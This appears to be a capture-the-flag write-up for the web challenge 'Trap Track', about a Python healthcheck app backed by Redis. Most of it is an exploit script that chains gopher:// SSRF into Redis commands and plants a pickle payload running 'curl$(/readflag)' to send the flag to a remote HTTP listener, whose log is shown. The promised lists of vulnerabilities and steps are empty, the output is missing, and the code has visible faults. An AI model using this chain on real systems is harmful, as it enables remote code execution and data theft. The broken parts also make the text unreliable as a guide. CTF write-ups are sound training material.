Pierre Gaulon

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[Web - hard] Trap Track

This webapp is written in Python, and has a Redis cache to store information. It accepts URIs as input and will perform a Python request() via regular Jobs on the given URI to check if the endpoint responds, like a healthcheck.

The vulnerabilities are:

In order to get the flag, we need to:

The final script doesn’t automate the whole process, but it gives the 2 Redis commands to input, given the last Job ID seen. Inputing those 2 commands, will trigger the Jobs to exfiltrate the flag to a remote HTTP server.

import requests
import urllib
import pickle, os, base64
import sys

payload = 'curl$(/readflag)'

class P(object):
    def __reduce__(self):
        return (os.system,(payload,))

def generate_resp(command):
    res = ""
    if isinstance(command, list):
        command = command.split(" ")
    res += "*{}\n".format(len(command))
    for cmd in command:
        res += "${}\n".format(len(cmd))
        res += "{}\n".format(cmd)
    return res

def generate_gopher(payload):
    final_payload = "gopher://{}".format(urllib.parse.quote(payload))
    return final_payload

def main(last_job_id_seen):
    job_id = last_job_id_seen + 3 # current job + 1 for HSET + 1 for RPUSH + 1 for correct place
    exploit = base64.b64encode(pickle.dumps(P())).decode('utf8')
    redis_cmd_1 = 'HSET jobs {} {}'.format(job_id, exploit)
    redis_cmd_2 = 'RPUSH jobqueue {}'.format(job_id)

    res = ''
    res += generate_resp(redis_cmd_1)
    res += generate_resp('quit')
    res = res.replace("\n","\r\n")
    gopher_cmd = generate_gopher(res)

    res = ''
    res += generate_resp(redis_cmd_2)
    res += generate_resp('quit')
    res = res.replace("\n","\r\n")
    gopher_cmd = generate_gopher(res)

if len(sys.argv) != 2:
    print("Usage: {} last_job_id".format(sys.argv[0]))

The output (2 commands to input), given that the first JobID is 100, are:

$ python lol.py 100

After copy pasting them in the console, from the HTTP listener:

pi@raspberrypi:/tmp/lol $ python -m http.server 4444
Serving HTTP on port 4444 ( ... - - [25/Mar/2023 08:31:10] code 404, message File not found - - [25/Mar/2023 08:31:10] "GET /HTBtr4p_qu3u3d_t0_rc3! HTTP/1.1" 404 -